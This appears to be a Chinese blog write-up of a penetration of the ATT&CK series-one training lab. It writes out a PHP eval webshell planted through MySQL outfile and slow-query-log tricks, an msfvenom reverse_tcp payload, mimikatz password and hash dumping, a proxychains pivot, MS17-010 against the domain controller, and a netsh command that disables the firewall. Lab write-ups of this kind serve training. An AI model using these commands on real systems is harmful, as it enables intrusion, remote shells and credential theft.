简单的内网渗透

ATT&CK实战系列一

网络拓扑图

 

nmap 端口扫描

发现80端口

直接访问IP

是一个PHP探针  未发现目录

使用dirsearch扫描目录

弱口令root root

搜索了一下2014 PHP 探针漏洞 兜兜转转找到一篇文章

先使用show variables like “%general%”

查询general_log 是否开启

使用命令set global general_log = on;开启

通过phpinfo.php(目录扫描得到)

得到绝对路径

直接执行select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/www/1.php';

执行后报错

查询show global variables like '%secure%';

发现在当前版本下这个 secure_file_priv的值默认为NULL 无法继续利用

利用mysql慢查询日志getshell

set global slow_query_log=1;

首先,设置slow_query_log=1.即启用慢查询日志

set global slow_query_log_file=“C:\\phpStudy\\WWW\\shell.php”

伪造(修改)slow_query_log_file日志文件的绝对路径以及文件名

select '<?php @eval($_POST["cmd"]);?>' or sleep(11);

将一句话写入

蚁剑链接成功

内网信息收集

有两张网卡,192.168.52.143和192.168.1.136

 

 

 

没有任何安全狗之类的防护设备,不用做免杀

系统漏洞挖掘

metesploit提取和内网信息收集

直接做个木马上传msf监听上线

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.162 lport=12345 -f exe >shell.exe

 

 

直接用攻击向量提取getsystem

通过mimikatz抓取到了本地管理员Administrator明文密码 hongrisec@20199

msf容易掉线,所以cs上线后提权操作

域是GOD

域内所有计算机

 

域控机器名为OWA,另一台则叫ROOT-TVI862UBEH

获取域内登录过的用户信息

也可以直接定位域控

通过域内信息收集得到

两个IP段:192.168.1.136        192.168.52.143

域名:god.org

域管:owa

域管IP:192.168.52.138

对域控进行渗透

添加路由

开启代理 use server/socks_proxy

proxychains设置代理nmap扫描内网 sudo vi /etc/proxychains4.conf 

扫描常用端口

开着445端口,扫描域控是否存在永恒之蓝ms17_010,确认后可以直接使用msf

打了几次也换了exp和payload都没有成功,原来没有关闭防火墙

所以使用ms17_010的远程命令执行关闭防火墙

set command netsh advfirewall set allprofiles state off

关闭防火墙之后用正向连接shell

windows/x64/meterpreter/bind_tcp

至此就打了域控的system权限

最后用mimikatz抓取密码

导出hash  run post/windows/gather/hashdump

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值